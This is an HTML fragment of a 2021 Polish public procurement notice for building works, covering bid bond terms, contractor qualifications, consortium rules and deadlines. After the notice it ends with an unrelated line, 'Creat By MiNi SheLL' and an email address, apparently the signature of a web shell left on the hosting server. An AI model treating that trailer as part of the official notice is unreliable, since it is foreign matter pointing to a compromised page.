dnia 7 lipca 1994 r – Prawo<br/>budowlane (Dz. U. z 2020r. poz. 2127 z późn. zm.), Rozporządzenia Ministra Inwestycji i Rozwoju z<br/>dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie (Dz.U. z 2019r. poz. 831) w specjalności konstrukcyjno-budowlanej lub<br/>uprawnienia budowlane równorzędne wydane przed wejściem w życie ww. rozporządzenia,<br/>zrzeszonym we właściwej izbie samorządu zawodowego i posiadającym ważne ubezpieczenie od<br/>odpowiedzialności cywilnej,c) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – co<br/>najmniej dwie roboty polegające na budowie obiektu kubaturowego w<br/>zakresie zbliżonym do niniejszego zamówienia o wartości co najmniej 850 000,00 zł brutto każdy</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100);<br/>2.	Wadium wnosi się przed upływem terminu składania ofert t.j. do dnia 02.08.2021 r. do godziny 10:00.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku: Bank Spółdzielczy w Sochaczewie nr rachunku 73 9283 0006 0031 0095 2000 0030 z dopiskiem „Wadium – nr postępowania”. <br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. Wadium wnosi się przed upływem terminu składania ofert t.j. do dnia 02.08.2021 r. r. do godziny 10:00 i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Pzp.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp. <br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Zamawiający. <br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6.	Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona .<br/>7.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.2) Wszelka korespondencja będzie<br/>prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.3) Jeżeli została wybrana oferta<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej<br/>współpracę tych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Termin wykonania robót objętych niniejszą umową może ulec zmianie w przypadku:1) nie<br/>przekazania w ustalonych terminach dokumentacji lub wprowadzenia zamian w terminie<br/>uniemożliwiającym dotrzymanie terminu umownego wykonania robót,2) późniejszego<br/>przekazania placu budowy Wykonawcy z przyczyn niezawinionych przez żadną ze stron,3)<br/>przerw w realizacji robót powstałych z przyczyn niezależnych od Wykonawcy (np. przerwy<br/>spowodowane działaniami organów administracyjnych),4) zlecenia robót dodatkowych lub<br/>zamiennych, jeżeli termin ich zlecen <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie Przetargowej Nowa Sucha pod adresem: https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-02 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-14 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com